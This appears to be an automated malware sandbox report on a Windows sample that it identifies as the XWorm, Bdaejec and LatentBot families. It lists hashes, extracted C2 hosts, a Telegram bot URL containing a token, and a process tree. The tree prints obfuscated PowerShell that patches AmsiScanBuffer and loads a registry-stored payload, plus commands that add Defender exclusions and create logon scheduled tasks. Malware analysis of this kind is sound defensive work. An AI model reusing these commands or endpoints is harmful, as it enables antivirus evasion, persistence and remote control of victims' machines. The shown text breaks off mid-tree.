Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/05/2025, 00:42

General

  • Target

    250519-z3llfszks4.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is a backdoor written in C++.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f4272139-aacd-4eb0-abeb-3e41dc01529c}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4caa7d59-2c60-49b6-8c4e-9ee1e261b434}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4480
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:760
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1044
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1060
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1196
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2760
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XCSObrhMeeUn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SapZSXApSQnrTi,[Parameter(Position=1)][Type]$AXluPOHCfj)$CkvqYvcfzUz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+'e'+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CkvqYvcfzUz.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pec'+[Char](105)+''+'a'+'l'+[Char](78)+'a'+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$SapZSXApSQnrTi).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$CkvqYvcfzUz.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+'S'+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Ch
ar](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+''+'a'+'l',$AXluPOHCfj,$SapZSXApSQnrTi).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $CkvqYvcfzUz.CreateType();}$sjdZEOUNECYEv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+'s');$THiMqbLdIIHaor=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YaZdFpGSsHHOGhbMcyV=XCSObrhMeeUn @([String])([IntPtr]);$suxPoEWZUqxVzFzRoNBuug=XCSObrhMeeUn 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pfJAWDkfzYl=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+'a'+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$maqyCpVvRCihqS=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object](''+[Char](76)+''+'o'+''+'a'+''+'d'+'Li'+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$hxXUZdrWInlLHMJfp=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$vASedcL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($maqyCpVvRCihqS,$YaZdFpGSsHHOGhbMcyV).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+'ll');$VtnUpISSTDJzQCDtN=$THiMqbLdIIHaor.Invoke($Null,@([Object]$vASedcL,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iSca'+'n'+'B'+'u'+''+'f'+'fe'+[Char](114)+'')));$hshDbGxLox=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,4,[ref]$hshDbGxLox);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VtnUpISSTDJzQCDtN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,0x20,[ref]$hshDbGxLox);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue(''+'x'+''+'6'+''+[Char](57)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4828
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:936
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cFXuWiIZaHuV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eQAPyQEdrnOwzb,[Parameter(Position=1)][Type]$guBhPbZNND)$ocobqWggrjF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ocobqWggrjF.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$eQAPyQEdrnOwzb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+'M'+[Char](97)+'na'+[Char](103)+'e'+[Char](100)+'');$ocobqWggrjF.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e','Pu'+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[
Char](100)+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+'wS'+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$guBhPbZNND,$eQAPyQEdrnOwzb).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ocobqWggrjF.CreateType();}$EZRJZXMFBeDOk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+'m'+[Char](46)+''+'d'+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'f'+'e'+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$yBnboBprzjikYQ=$EZRJZXMFBeDOk.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VPGvYHGxnYzvifaRDgT=cFXuWiIZaHuV @([String])([IntPtr]);$RsnhTsiqQuHZRuAbXoZkWV=cFXuWiIZaHuV 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mRPwSxwZAFc=$EZRJZXMFBeDOk.GetMethod('G'+'e'+''+[Char](116)+''+'M'+'o'+'d'+'u'+'l'+''+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rn'+'e'+''+[Char](108)+'3'+'2'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$WaBoPsgGDqJkpS=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$MDnjkVAOZpiPdPyIh=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$qJnGHSp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaBoPsgGDqJkpS,$VPGvYHGxnYzvifaRDgT).Invoke(''+'a'+''+'m'+'si.d'+[Char](108)+''+'l'+'');$jFoarKIuYfnXyuXWB=$yBnboBprzjikYQ.Invoke($Null,@([Object]$qJnGHSp,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'a'+[Char](110)+'Buf'+'f'+''+[Char](101)+''+'r'+'')));$InwTbBCCVQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,4,[ref]$InwTbBCCVQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jFoarKIuYfnXyuXWB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,0x20,[ref]$InwTbBCCVQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5232
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:2624
                          • C:\Users\Admin\AppData\Roaming\x69.exe
                            C:\Users\Admin\AppData\Roaming\x69.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2076
                          • C:\Users\Admin\AppData\Roaming\x69.exe
                            C:\Users\Admin\AppData\Roaming\x69.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2132
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                            PID:1236
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1312
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1352
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1372
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1428
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1460
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1524
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1552
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2496
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1616
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1684
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1732
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1796
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1832
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1968
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2028
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1128
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2108
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2148
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2188
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2280
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2480
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2488
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2524
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2736
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2752
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2800
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2832
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2852
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2992
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
  1⤵
  PID:3112
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  1⤵
  PID:3436
• C:\Windows\Explorer.EXE
  C:\Windows\Explorer.EXE
  1⤵
  • Suspicious behavior: GetForegroundWindowSpam
  • Suspicious use of UnmapMainImage
  PID:3544
    • C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe
      "C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"
      2⤵
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3000
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:516
        • C:\Users\Admin\AppData\Roaming\x69.exe
          "C:\Users\Admin\AppData\Roaming\x69.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2472
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3996
        • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
          "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5740
            • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
              C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              PID:2700
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\396d7b93.bat" "
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:5076
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      6⤵
                      PID:3964
            • C:\Windows\system32\cmd.exe
